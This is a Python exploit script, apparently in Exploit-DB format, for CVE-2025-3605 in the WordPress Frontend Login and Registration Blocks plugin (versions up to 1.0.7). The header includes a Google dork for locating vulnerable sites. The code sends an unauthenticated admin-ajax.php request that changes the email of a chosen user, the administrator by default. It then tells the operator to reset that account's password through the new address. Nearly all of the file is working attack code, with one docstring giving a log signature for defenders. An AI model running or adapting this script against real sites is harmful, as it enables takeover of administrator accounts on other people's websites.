# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation
# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/
# Date: 2025-05-12
# Exploit Author: Md Shoriful Islam (RootHarpy)
# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/
# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip
# Version: <= 1.0.7
# Tested on: Ubuntu 22.04 + WordPress 6.5.2
# CVE : CVE-2025-3605
import requests
import argparse
import sys
def display_banner():
    """Print the tool's ASCII-art banner to stdout.

    Purely cosmetic: the banner is a fixed multi-line literal emitted
    with a single print() call. Returns None.
    """
    art = """
_____ _____ ___ __ ___ ___ ____ __ __ ___
/ __\ \ / / __|_|_ ) \_ ) __|__|__ / / / / \| __|
| (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \
\___| \_/ |___| /___\__/___|___/ |___/\___/\__/|___/
"""
    print(art)
def suppress_ssl_warnings():
    """Disable urllib3 warnings for the whole process.

    The session built by initialize_session() sets verify=False, which
    would otherwise make urllib3 emit a certificate-validation warning on
    every request. Only the warning output is affected; nothing about
    the request itself changes.
    """
    urllib3_pkg = requests.packages.urllib3
    urllib3_pkg.disable_warnings()
def initialize_session():
    """Build the requests.Session used for the single POST request.

    TLS certificate verification is switched off (verify=False) and a
    fixed desktop-Chrome User-Agent is installed on the session. No
    cookies or credentials are attached, so the request leaves the
    session unauthenticated.

    Returns:
        requests.Session: the configured session.
    """
    browser_ua = (
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/113.0.0.0 Safari/537.36"
    )
    sess = requests.Session()
    sess.headers.update({'User-Agent': browser_ua})
    sess.verify = False
    return sess
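def parse_input_args(argv=None):
    """Parse the command line and return the argparse namespace.

    Args:
        argv: optional list of argument strings. When None (the
            default, and what run_exploit() passes) argparse reads
            sys.argv[1:] as before; passing an explicit list makes the
            parser usable from tests without touching sys.argv.

    Returns:
        argparse.Namespace with attributes ``target`` (required),
        ``target_user`` (default "1") and ``new_email``
        (default "example@gmail.com").

    Raises:
        SystemExit: argparse exits when ``--target`` is missing or an
        unknown option is given.
    """
    parser = argparse.ArgumentParser(
        description="Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7"
    )
    parser.add_argument("--target", "-t", required=True, help="Target URL to exploit")
    parser.add_argument("--target_user", "-u", default="1", help="User ID for target (default: 1)")
    parser.add_argument(
        "--new_email", "-e", default="example@gmail.com",
        help="Email to change to (default: example@gmail.com)",
    )
    # argv=None keeps the original behaviour of reading sys.argv[1:].
    return parser.parse_args(argv)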
def generate_payload(user, email):
    """Return the form fields sent in the POST body.

    The dict carries the plugin's AJAX action name together with the
    target user id and the replacement email address. For defenders,
    the combination of ``action=flrblocksusersettingsupdatehandle``
    with a ``user_id`` field in a POST to admin-ajax.php is the request
    shape to look for in access or WAF logs.

    Args:
        user: user id value sent as ``user_id`` (passed through as-is).
        email: value sent as ``flr-blocks-email-update``.

    Returns:
        dict[str, object] of the three form fields.
    """
    fields = {}
    fields['action'] = 'flrblocksusersettingsupdatehandle'
    fields['user_id'] = user
    fields['flr-blocks-email-update'] = email
    return fields
def execute_exploit(session, target_url, payload):
    """POST the form fields to the target's admin-ajax.php endpoint.

    Args:
        session: object exposing a requests-style ``post(url, data=...)``.
        target_url: site base URL; ``/wp-admin/admin-ajax.php`` is
            appended verbatim (no normalisation of a trailing slash).
        payload: dict of form fields, see generate_payload().

    Returns:
        Whatever ``session.post()`` returns.

    Any exception raised by the request is printed to stdout and the
    process exits with status 1; the error is not re-raised.
    """
    try:
        reply = session.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload)
    except Exception as exc:
        print(f"Request error: {exc}")
        sys.exit(1)
    return reply
def process_response(response):
    """Print a success/failure line based on the HTTP reply.

    The request is reported as successful only when the status is 200
    and the stripped body is something other than the single character
    "0"; every other combination is reported as a failure together with
    the status code and body. Returns None.

    Args:
        response: object with ``status_code`` and ``text`` attributes.
    """
    status = response.status_code
    succeeded = status == 200 and response.text.strip() != "0"
    if not succeeded:
        print(f"Exploit failed. HTTP Status: {status}, Response: {response.text}")
        return
    print(f"Exploit succeeded! Response: {response.text}")
    print("Next: Go to the Forgot Password page and reset the admin password using the new email!")
def run_exploit():
    """Script entry point: banner, CLI parsing, one POST, result report.

    The steps keep their original order so the banner is printed and
    urllib3 warnings are silenced before argparse may exit on bad
    arguments. Exactly one HTTP request is sent.
    """
    display_banner()
    suppress_ssl_warnings()
    args = parse_input_args()
    http = initialize_session()
    form = generate_payload(args.target_user, args.new_email)
    reply = execute_exploit(http, args.target, form)
    process_response(reply)
# Only run when executed as a script, not when imported.
if __name__ == "__main__":
    run_exploit()